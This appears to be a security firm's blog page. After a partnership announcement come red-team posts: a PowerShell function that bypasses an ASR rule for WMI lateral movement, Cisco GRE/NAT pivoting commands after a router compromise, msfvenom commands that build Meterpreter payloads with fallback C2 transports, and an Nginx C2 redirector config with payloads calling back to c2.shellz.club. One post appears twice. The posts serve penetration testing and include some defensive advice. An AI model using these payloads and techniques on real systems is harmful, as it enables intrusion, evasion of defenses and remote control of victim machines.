• Your shield in Cyber Security

Ionize and Cogito Group Strategic Partnership

Ionize and Cogito Group today announced a strategic partnership that will enable both companies to significantly strengthen the breadth and depth of their cyber security capabilities.

 

Ionize and Cogito Group are both successful Australian cyber security companies with a global presence, with shared heritage as local Canberra start-ups. As Ionize and Cogito continue to broaden their portfolios, the partnership arrangement encourages both companies to collaborate, share resources, and support each other’s ventures.

 

The primary objective of the partnership is to work together to add value to each other’s business through the delivery of strategic projects. By sharing complementary services – with Ionize specialising in threat detection, adversary tactics and governance risk & compliance, and Cogito Group specialising in authentication, cloud security, identity management and data protection – Ionize and Cogito Group will be able offer a larger suite of services to our customers, which creates a greater capacity to meet our customers’ expectations.

 

Stay Up to Date

Latest News

Lateral Movement in an Environment with Attack Surface Reduction

This blog post will discuss techniques to bypass the Attack Surface Reduction (ASR) rule “Block process creations originating from PSExec and WMI commands” which I came up against during a recent engagement.

 

The simplest solution to bypassing these restrictions could be to use a different lateral movement method such as Windows Remote Management (WinRM), Remote Desktop Protocol (RDP) or Distributed Component Object Model (DCOM) applications. Let’s assume these are all out of the question for the sake of the blog post.

 

The PSExec lateral movement method (also referred to by the name SMBExec) uses Remote Procedure Calls over SMB to call into the Service Control Manager and create a Window Service for code or command execution. I tested PSExec with the ASR rule enabled using the Invoke-TheHash toolkit and nothing prevented creating a Windows Service to create a process. I read online that the ASR rule only impacts the Sysinternals PsExec implementation which further tested proved correct. So, the simplest bypass would be to use a custom implementation of the PsExec method such as Invoke-TheHash.

 

Another bypass method would be to use the Windows Management Instrumentation (WMI) service. The WMI service will lookup requests in a repository containing the class definitions to determine a responsible provider. The WMI providers contain the functionality and implement the classes and methods. The most common WMI lateral movement implementations leverage the Win32_Process::Create method within the Win32 Provider to launch a process on the target machine. This method is blocked when the ASR rule is enabled, and often monitored by Endpoint Detection and Response (EDR) software.

 

This does not prevent an attacker from leveraging other providers, classes and methods for lateral movement. WMI contains powerful functionality with a diverse set of providers. The Win32_Service class exposes functionality to manage services on a target machine. I used this class to bypass the ASR rule and perform lateral movement with the PowerShell function below. The code leverages the Win32_Service class to create, start and delete a service on the target machine. The service is configured to spawn a command shell and run the specified command. This setup can be used to launch a Cobalt Strike, Empire, Covenant, etc implant in an ASR enabled environment.

WMI Service Lateral Move

function Invoke-WMIServiceLateralMove {
	Param (
        [parameter(Mandatory)][String]$ComputerName,
    	[parameter(Mandatory)][String]$Command,
        [String]$ServiceName = "MemProtectSvc",
        [String]$ServiceDescription = "Memory Protection"
	)

    $Command = "%COMSPEC% /C " + $Command

    Write-Host ("Creating Service {0} on {1}" -f $ServiceName, $ComputerName)
    $ret = Invoke-WmiMethod -ComputerName $ComputerName -Class win32_service -name create -ArgumentList @($true,$ServiceDescription,2,$null,$null,$ServiceName,$Command,$null,16,'Automatic',$null,$null)
    # ArgumentList MUST be (DesktopInteract, DisplayName, ErrorControl, LoadOrderGroup, LoadOrderGroupDependencies, 
    # Name, PathName, ServiceDependencies, ServiceType, StartMode, StartName, StartPassword)
    if ($ret.ReturnValue -ne 0) {
        Write-Host ("Service Creation Failed! Output:")
        Write-Output $ret 
    }
    Write-Host ("Starting Service {0} on {1}" -f $ServiceName, $ComputerName)
    $service = Get-WmiObject -ComputerName $ComputerName -Class Win32_Service -Filter "Name='$ServiceName'"
    $ret = $service.startservice() # this will block because the executable is not a real service

    Write-Host ("Deleting Service {0} on {1}" -f $ServiceName, $ComputerName)
    $ret = $service.StopService()
    $ret = $service.Delete()
    if ($ret.ReturnValue -ne 0) {
        Write-Host ("Service Deletion Failed! Manual cleanup required for {0}" -f $ServiceName)
        Write-Output $ret 
    }
	Write-Host "Done"
}

I used Windows Services instead of directly accessing the registry because it allowed starting and stopping the service for instant lateral movement. Stealthier approaches exist and the Win32_Registry class could be used to modify services, scheduled tasks, start-up entries, ASR rules, etc. These were the first things that come to mind when thinking about lateral movement with the methods available in the Win32_Registry class.

 

There are some creative methods blogged about online for lateral movement without the Win32_Process class. These include installing MSI packages, VBS scripts, class derivation and loading a custom provider.

 

The ASR rule should not be considered a security boundary and can be easily bypassed using creative approaches. I recommend disabling PSExec and WMI if they are not required within an environment to make lateral movement move difficult. If PSExec and WMI are required, they should be monitored for unusual behavior as this could indicate malicious activity.

Stay Up to Date

Latest News

Cisco Pivoting for Penetration Testers

Updated: Jul 21, 2020

On a recent engagement we faced a difficult target with minimal external attack surface. Their website had a few flaws, but it was hosted externally with a third party. Even if we could compromise the site, it likely wouldn’t result in the internal network access we were searching for.

Thanks to Shodan, we identified a Cisco router which was externally-accessible. This is a rundown of how we leveraged this device into a full network compromise.

 

Disclaimer: This information would probably be nothing new for Cisco gurus or someone with a CCNA; but hopefully this post grants some security folk out there enough knowledge to turn a router compromise into internal shells in the future. As always, take extreme care when dealing with any critical network infrastructure.

 

The Router

 

Having identified a router which belonged to the target, we performed the typical enumeration we complete on every device: port scans, default password checks, SNMP checks, etc. Fortunately for us, the router had the public SNMP string set to “public”, and the private string set to the default value “private”. With access to the private string, tools such as Metasploit’s scanner/snmp/cisco_config_tftp module can be used to pull down the running configuration, or more specifically, the hashes of passwords being used on the device. The three-letter password was not particularly resilient to cracking, and in a short few minutes we were on the router with full permissions.

 

Great, we have access to the router – now what? We conducted an in-depth analysis of pivoting methods used for penetration testers when encountering Cisco devices. Unfortunately for us, there was very limited information out there for solving the particular constraints facing us on this engagement.

 

The Network

 

What we had done so far looked similar to the above picture. We had compromised the router via its external interface (100.200.100.200) and had pulled down its configuration file. The internal LAN was reachable via one of the interfaces with the IP address range of 192.168.1.3/24.  There were further complications and interfaces, but they aren’t necessary detail for the process we went through. One of our biggest hurdles was the configuration of the internal network. Clients were being assigned an IP address via an internal router located at 192.168.1.1. This was also their default gateway for any outbound traffic. The significance of this will come into play shortly.

 

Failed Attempts

 

The initial naive plan was to simply port-forward a connection from the external interface through to the internal LAN, resulting in quick-and-dirty access to specific services, allowing us to obtain shells before tearing down the now-obsolete port forward. This would be a simple command for the Cisco router to perform Static Network Address Translation (SNAT). We’ll get into actual commands in the successful attempts section, but this would essentially be saying to the Cisco device, “When you receive an incoming packet on 100.200.100.200:30000, always translate this to the IP address and port 192.168.1.40:3389 and forward it on via the internal interface.” With luck, the RDP service on 192.168.1.40 would respond, the packet would be forwarded back out via 192.168.1.3, we’d enter in some stolen credentials and success! Unfortunately for us this didn’t happen.

 

As you may have guessed from our earlier information, the problem was that the packets were not in fact coming back to 192.168.1.3, but rather, seeing that the source address (50.50.50.50) was outside of their subnet, the default gateway (192.168.1.1) was being used to try to reach our IP! To this day I don’t know why the 192.168.1.1 device couldn’t route externally. As with most security problems, these curve balls create some interesting problems that people don’t usually see. The correct solution to this routing issue would be “Reconfigure the gateway to allow routing out to our IP address”, but as we don’t control that device it’s not an option. A pictorial version of our problem is represented below.

 

Okay, so at the router, we’re translating the destination address to be the internal LAN, but that leaves us with an “invalid” source address for the purposes of routing. We can’t change the router to do source address translation instead of destination address translation because we’d then have no way of getting packets to the correct IP address (you can’t just set a route on your own computer saying the gateway for 192.168.1.1/24 is 100.200.100.200: the routers across the internet would not know how to honour your 192.168.1.40 destination IP). What we need is some form of double NAT; that being packets should exit the router having translated both the source and destination address. So, how to do double NAT on a Cisco 1841? The answer is not in the first 40 pages of Google results – trust me, I looked. It appears that this is possible on Cisco ASA devices, but not possible on a Cisco 1841. I attempted all manner of loopbacks / forwarding rules / NAT chains etc with no luck. I could not get the Cisco device to translate both source and destination IP addresses. If anyone knows how to do this on a Cisco 1841 I’d love to hear from you.

 

Our Savior – Generic Routing Encapsulation (GRE)

 

GRE is a protocol that wraps up other traffic and tunnels it through to a designated endpoint. Think of it as similar to a VPN in some ways. The key information is that this sorts out our “destination” address problem. We can set the destination to now be our target LAN subnet; an address in the 192.168.1.1/24 range; and tell the tunnel to “take care of the rest” for us in terms of getting the traffic to the target Cisco router. Anyway, enough theory, here are the commands. Here we set up a GRE tunnel with the subnet 172.16.0.0/24, assigning the Cisco device 172.16.0.1, and our device 172.16.0.3:

// On the attacking machine
modprobe ip_gre
iptunnel add mynet mode gre remote <target external ip> local <attacker external ip> ttl 255
ip addr add 172.16.0.3/24 dev mynet
ifconfig mynet up
route add -net 172.16.0.0 netmask 255.255.255.0 dev mynet

// On the Cisco device
config term
interface Tunnel0
ip address 172.16.0.1 255.255.255.0
ip mtu 1514
ip virtual-reassembly
tunnel source <Interface of WAN on the Cisco>
tunnel destination <Attacking Machine IP> 
 

After these commands are run on both devices, you should be able to ping 172.16.0.1 from your attacking machine, and ping 172.16.0.3 from the Cisco router. We have effectively created the following picture.

 

 

NAT – New and Improved

 

Now we’re not quite out of the woods yet. If we examine the traffic path we still have our return address problem (pictured below). The key successful step that we’ve taken however is that we’re no longer using up our “one” NAT rule on the Cisco 1841 to get our initial destination packet into a form that is workable for us. Revisiting our original port forwarding idea, we could continue to do ad hoc SNAT rules; but we’re not going to go through all this effort to address one port at a time. There has to be a better way.

 
 

Enter – Dynamic NAT. This is more commonly-seen on your typical home setup where you have multiple devices behind your router, and then you’re “NATing” your traffic out and presenting one public IP address to the internet at large. When you consider it that way, it’s almost exactly what we want to do in this situation, however the “internet at large” is actually our target LAN. If we can perform this type of NAT, as far as the target computers are concerned, the traffic source would be coming from 192.168.1.3, and they should return the traffic to that IP address. The NAT table on the Cisco router will remember what incoming traffic produced that specific IP / port source combination, and map it back to our 172.16.0.3 address appropriately. Again this is the same thing done by your home router when receiving traffic back from the internet after you make a web request. Another key point to remember is because the source address is being translated to 192.168.1.3, this is within the subnet of the target LAN. As a result, they ignore the gateway of 192.168.1.1 which was giving us problems in the past!

Again, enough theory, what are the commands?

 
// On the Cisco Device
config term
interface Tunnel0
ip nat inside          
interface <Internal Lan Interface>
ip nat outside
exit
config term
access-list client-list permit ip 172.16.0.0 0.0.255.255         
ip nat enable       	 
ip nat source route-map test interface <Internal LAN Interface> overload
ip nat inside source list client-list interface <Internal LAN Interface> overload 
 

Success! With this configuration it is now possible to route traffic to the internal network from our attacking machine over a GRE tunnel. All of the 192.168.1.1/24 range is reachable from our attacking machine, and no special proxytunnels-like program is needed to access them. A final picture to show what the setup looks like. Hopefully this saves you the time it took me to figure it out!

 

Happy Hacking – Peleus

Stay Up to Date

Latest News

Multiple Transports in a Meterpreter Payload

Updated: Jul 21, 2020

It’s no secret that we’re big fans of the Metasploit Framework for red-team operations. Every now and again, we come across a unique problem and think “Wouldn’t it be great if Metasploit could do X?”

 

Often, after some investigation, it turns out that it is actually possible! But unfortunately, some of these great features haven’t had the attention they deserve. We hope this post will correct that for one feature that made our life much easier on a recent engagement.

 

Once Meterpreter shellcode has been run; whether from a phish, or some other means, it will reach out to the attacker’s Command and Control (C2) server over some network transport, such as HTTP, HTTPS or TCP. However, in an unknown environment, a successful connection is not guaranteed: firewalls, proxies, or intrusion prevention systems might all prevent a certain transport method from reaching out to the public Internet.

Repeated trial and error is sometimes possible, but not always. For a phish, clicks come at a premium. Some exploits only give you one shot to get a shell, before crashing the host process. Wouldn’t it be great if you could send a Meterpreter payload with multiple fallback communication options? (Spoiler: you can, though it’s a bit fiddly)

 

Transports

 

Before we get there, let’s take a step back. Meterpreter has the ability to have multiple “transports” in a single implant. A transport is the method by which it communicates to the Metasploit C2 server: TCP, HTTP, etc. Typically, Meterpreter is deployed with a single transport, having had the payload type set in msfvenom or in a Metasploit exploit module (e.g. meterpreter_reverse_http).

But after a connection has been made between the implant and the C2 server, an operator can add additional, backup transports. This is particularly useful for redundancy: if one path goes down (e.g. your domain becomes blacklisted), it can fall back to another.

A transport is defined by its properties:

  • The type of transport (TCP, HTTP, etc.)

  • The host to connect to

  • The port to connect on

  • A URI, for HTTP-based transports

  • Other properties such as retry times and timeouts

Once a Meterpreter session has been set up, you can add a transport using the command transport add and providing it with parameters (type transport to see the options).

 

Extension Initialisation Scripts

 

Meterpreter also has the concept of “extensions” which contain the vast majority of Meterpreter’s functionality. By default, the stdapi  extension (containing the most basic functionality of Meterpreter) is loaded during session initialisation. Other extensions, such as Kiwi (Mimikatz), PowerShell, or Incognito, can be added dynamically at runtime by using the load command.

 

When creating stageless payloads, msfvenom allows for including extensions to be pre-loaded; so rather than having to send them across the wire after session initialisation, they are already set up ready to go. You can do this with the extensions parameter.

 

One neat feature which we think hasn’t gotten nearly enough attention is the ability to run a script inside the PowerShell and Python extensions, if they have been included in a stageless payload. The script, if included, is run after all of the extensions are loaded, but before the first communication attempt.

 

This provides the ability to add extra transports to the Meterpreter implant before it has even called back to the C2. This is made much easier by using the provided PowerShell bindings for this functionality; with the Add-TcpTransport and Add-WebTransport functions.

 

This is extremely useful in situations where the state of the target’s network is unknown: perhaps a HTTPS transport will work, or maybe it’ll be blocked, or the proxy situation will cause it to fail. Maybe TCP will work on port 3389. By setting up multiple transports in this initialisation script, Meterpreter will try each of them (for a configurable amount of time), before moving on to the next one.

 

To do this:

  • Create a stageless meterpreter payload, which pre-loads the PowerShell extension. The transport used on the command line will be the default

  • Include a PowerShell script as an “Extension Initialisation Script” (parameter name is extinit, and has the format of <extension name>,<absolute file path>). This script should add additional transports to the Meterpreter session.

  • When the shellcode runs, this script will also run

  • If the initial transport (the one specified on the command line) fails, Meterpreter will then try each of these alternative transports in turn

 

The command line for this would be:

msfvenom -p windows/meterpreter_reverse_tcp lhost=<host> lport=<port> sessionretrytotal=30 sessionretrywait=10 extensions=stdapi,priv,powershell extinit=powershell,/home/ionize/AddTransports.ps1 -f exe 

Then, in AddTransports.ps1 :

Add-TcpTransport -lhost <host> -lport <port> -RetryWait 10 -RetryTotal 30
Add-WebTransport -Url http(s)://<host>:<port>/<luri>&nbsp;-RetryWait 10 -RetryTotal 30 
 

Some gotchas to be aware of:

  • Make sure you include the full path to the extinit parameter (relative paths don’t appear to work)

  • Ensure you configure how long to try each transport before moving on to the next.

  • RetryWait is the time to wait between each attempt to contact the C2 server

  • RetryTotal is the total amount of time to wait before moving on to the next transport

  • Note that the parameter names for retry times and timeouts are different between the PowerShell bindings and the Metasploit parameters themselves: in the PowerShell extension, they are RetryWait and RetryTotal; in Metasploit they are SessionRetryWait and SessionRetryTotal (a tad confusing, as they relate to transports, not sessions)

 

Huge thanks to @TheColonial for implementing this feature, and for helping us figure out how to use it.

Stay Up to Date

Latest News

Configuring Metasploit and Empire to Catch Shells behind an Nginx Reverse Proxy

Updated: Jul 21, 2020

During red team engagements, we’ve found ourselves in the situation of wanting to use multiple remote access tools (Metasploit, Empire, Cobalt Strike, etc), all over port 443 for HTTPS communications. This is common when the only egress method from a network is HTTPS. This could be achieved with multiple hosts, each receiving a different type of shell; but what if you want or need to do this through a single domain or single host? This can be solved by using a reverse proxy to terminate the SSL connections and then proxy requests to each of the required tools based on a URI path. We’ve used Nginx for this purpose. The Nginx configuration below uses the location directive to pass all requests starting with /update to Metasploit (which will be listening on 127.0.0.1:2080), and the default Empire URIs to 127.0.0.1:1080. The connections are SSL-terminated by Nginx; and this is important to take into account when configuring the Metasploit and Empire handlers.

server {
	listen 80 default_server;
	listen [::]:80 default_server;

	listen 443 ssl default_server;
	listen [::]:443 ssl ipv6only=on default_server;
	
	root /var/www/html;
	index index.html;
	server_name c2.shellz.club;

	location / {
		# First attempt to serve request as file, then
		# as directory, then fall back to displaying a 404.
		try_files $uri $uri/ =404;
	}

	# Managed by Certbot
	ssl_certificate /etc/letsencrypt/live/c2.shellz.club/fullchain.pem; 
	ssl_certificate_key /etc/letsencrypt/live/c2.shellz.club/privkey.pem; 
	include /etc/letsencrypt/options-ssl-nginx.conf;
	ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem;

	# Metasploit
	location ~ ^/update(.*) {
		proxy_pass http://127.0.0.1:2080;
	}
	# Empire
	location ~ ^/(admin/get.php|news.php|login/process.php|download/more.php) {
		proxy_pass http://127.0.0.1:1080;
	}
}
 

Metasploit Handler Setup

 

I’ll demonstrate how to configure a Metasploit handler that accepts reverse HTTPS Meterpreter connections (staged or stageless) from any architecture or operating system. The multi/meterpreter/reverse_http module handles detection of architecture and OS making our lives easier. When an initial connection is made to the handler (for staged payloads) the LHOST and LPORT parameters are used to tell the second stage where to connect. This means they should be the Nginx proxy and not the Metasploit listener. The requests will be connecting with an URI of /update and this needs to be reflected within the LURI parameter.

 
 

Our Metasploit handler needs to listen on 127.0.0.1:2080 as seen in the above Nginx configuration. We do this using the advanced configuration options (nshow advanced) ReverseListenerBindAddress and ReverseListenerBindPort. We have used a multi/meterpreter/reverse_http handler (not HTTPS) because Nginx handles SSL terminates for us. We need to tell Metasploit to use HTTPS connection when connecting to Nginx. This is done be configuring the OverrideScheme parameter to HTTPS. Lastly, the OverrideRequestHost parameter must be true because otherwise “Metasploit uses the incoming request’s Host header value (if present) for the second stage configuration instead of the LHOST parameter.” (Thanks to @TheColonial for the tip on that).

 

 

Metasploit Payload Generation

 

Now we can generate Meterpreter HTTPS payloads (staged or stageless) for any OS or architecture. The payloads can be hosed on the same server over HTTPS using Nginx. The payloads require the LHOST and LPORT of the Nginx server, and LURI used to route the requests to Metasploit. The setup is flexible enough to catch other shells such as an Empire agent:

 
# Windows 64bit Stageless
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=c2.shellz.club LPORT=443 LURI=update -f exe > /var/www/html/meterp.exe
# Windows 32bit Staged
msfvenom -p windows/meterpreter/reverse_https LHOST=c2.shellz.club LPORT=443 LURI=update -f exe > /var/www/html/meterp_staged.exe  

 

Empire Setup

 

The Empire setup uses the http listener (uselistener http command). The Host parameter for staging should be the Nginx address (in this example, https://c2.shellz.club:443). The Empire listening address can then be configured using the BindIP and Port parameters which should match the IP address (127.0.0.1) and port (1080) in the Nginx configuration file. No further configuration is required.

 

Stay Up to Date

Latest News

Configuring Metasploit and Empire to Catch Shells behind an Nginx Reverse Proxy

Updated: Sep 2, 2020

During red team engagements, we’ve found ourselves in the situation of wanting to use multiple remote access tools (Metasploit, Empire, Cobalt Strike, etc), all over port 443 for HTTPS communications. This is common when the only egress method from a network is HTTPS. This could be achieved with multiple hosts, each receiving a different type of shell; but what if you want or need to do this through a single domain or single host? This can be solved by using a reverse proxy to terminate the SSL connections and then proxy requests to each of the required tools based on a URI path. We’ve used Nginx for this purpose. The Nginx configuration below uses the location directive to pass all requests starting with /update to Metasploit (which will be listening on 127.0.0.1:2080), and the default Empire URIs to 127.0.0.1:1080. The connections are SSL-terminated by Nginx; and this is important to take into account when configuring the Metasploit and Empire handlers.

 

server {
 listen 80 default_server;
 listen [::]:80 default_server;
 
 listen 443 ssl default_server;
 listen [::]:443 ssl ipv6only=on default_server;
 
 root /var/www/html;
 index index.html;
 server_name c2.shellz.club;
 
 location / {
 # First attempt to serve request as file, then
 # as directory, then fall back to displaying a 404.
 try_files $uri $uri/ =404;
 }
 
 # Managed by Certbot
 ssl_certificate /etc/letsencrypt/live/c2.shellz.club/fullchain.pem; 
 ssl_certificate_key /etc/letsencrypt/live/c2.shellz.club/privkey.pem; 
 include /etc/letsencrypt/options-ssl-nginx.conf;
 ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem;
 
 # Metasploit
 location ~ ^/update(.*) {
 proxy_pass http://127.0.0.1:2080;
 }
 # Empire
 location ~ ^/(admin/get.php|news.php|login/process.php|download/more.php) {
 proxy_pass http://127.0.0.1:1080;
 }
}

Metasploit Handler Setup I’ll demonstrate how to configure a Metasploit handler that accepts reverse HTTPS Meterpreter connections (staged or stageless) from any architecture or operating system. The multi/meterpreter/reverse_http module handles detection of architecture and OS making our lives easier. When an initial connection is made to the handler (for staged payloads) the LHOST and LPORT parameters are used to tell the second stage where to connect. This means they should be the Nginx proxy and not the Metasploit listener. The requests will be connecting with an URI of /update and this needs to be reflected within the LURI parameter.

Our Metasploit handler needs to listen on 127.0.0.1:2080 as seen in the above Nginx configuration. We do this using the advanced configuration options (nshow advanced) ReverseListenerBindAddress and ReverseListenerBindPort. We have used a multi/meterpreter/reverse_http handler (not HTTPS) because Nginx handles SSL terminates for us. We need to tell Metasploit to use HTTPS connection when connecting to Nginx. This is done be configuring the OverrideScheme parameter to HTTPS. Lastly, the OverrideRequestHost parameter must be true because otherwise “Metasploit uses the incoming request’s Host header value (if present) for the second stage configuration instead of the LHOST parameter.” (Thanks to @TheColonial for the tip on that).

Metasploit Payload Generation Now we can generate Meterpreter HTTPS payloads (staged or stageless) for any OS or architecture. The payloads can be hosed on the same server over HTTPS using Nginx. The payloads require the LHOST and LPORT of the Nginx server, and LURI used to route the requests to Metasploit. The setup is flexible enough to catch other shells such as an Empire agent:

 
# Windows 64bit Stageless
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=c2.shellz.club LPORT=443 LURI=update -f exe > /var/www/html/meterp.exe
# Windows 32bit Staged
msfvenom -p windows/meterpreter/reverse_https LHOST=c2.shellz.club LPORT=443 LURI=update -f exe > /var/www/html/meterp_staged.exe

Empire Setup The Empire setup uses the http listener (uselistener http command). The Host parameter for staging should be the Nginx address (in this example, https://c2.shellz.club:443). The Empire listening address can then be configured using the BindIP and Port parameters which should match the IP address (127.0.0.1) and port (1080) in the Nginx configuration file. No further configuration is required.

 

Stay Up to Date

Latest News